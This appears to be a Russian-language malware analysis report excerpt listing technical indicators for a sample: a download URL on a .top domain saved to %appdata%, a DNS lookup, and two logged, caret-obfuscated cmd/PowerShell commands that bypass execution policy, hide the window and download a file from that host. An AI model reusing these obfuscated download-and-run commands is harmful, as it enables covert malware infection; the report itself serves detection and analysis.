Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oW^E^r^S^heL^l.E^Xe^ ^-execUTIOn^poli^C^y ^bYp^aS^S ^-^N^o^Pr^ofIle^ ^-w^IndoWSTylE^ HI^dDE^N (^N^EW-^O^BJect^ SYs^TEm.N^e^T^.^wE^B^Cli^enT).^D^OWnloA^dFIl^E^(^'http://sut...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "P^oW^E^r^S^heL^l.E^Xe^ ^-execUTIOn^poli^C^y ^bYp^aS^S ^-^N^o^Pr^ofIle^ ^-w^IndoWSTylE^ HI^dDE^N (^N^EW-^O^BJect^ SYs^TEm.N^e^T^.^wE^B^Cli^enT).^D^OWnloA^dFIl^E^(^'http://sut...' (со скрытым окном)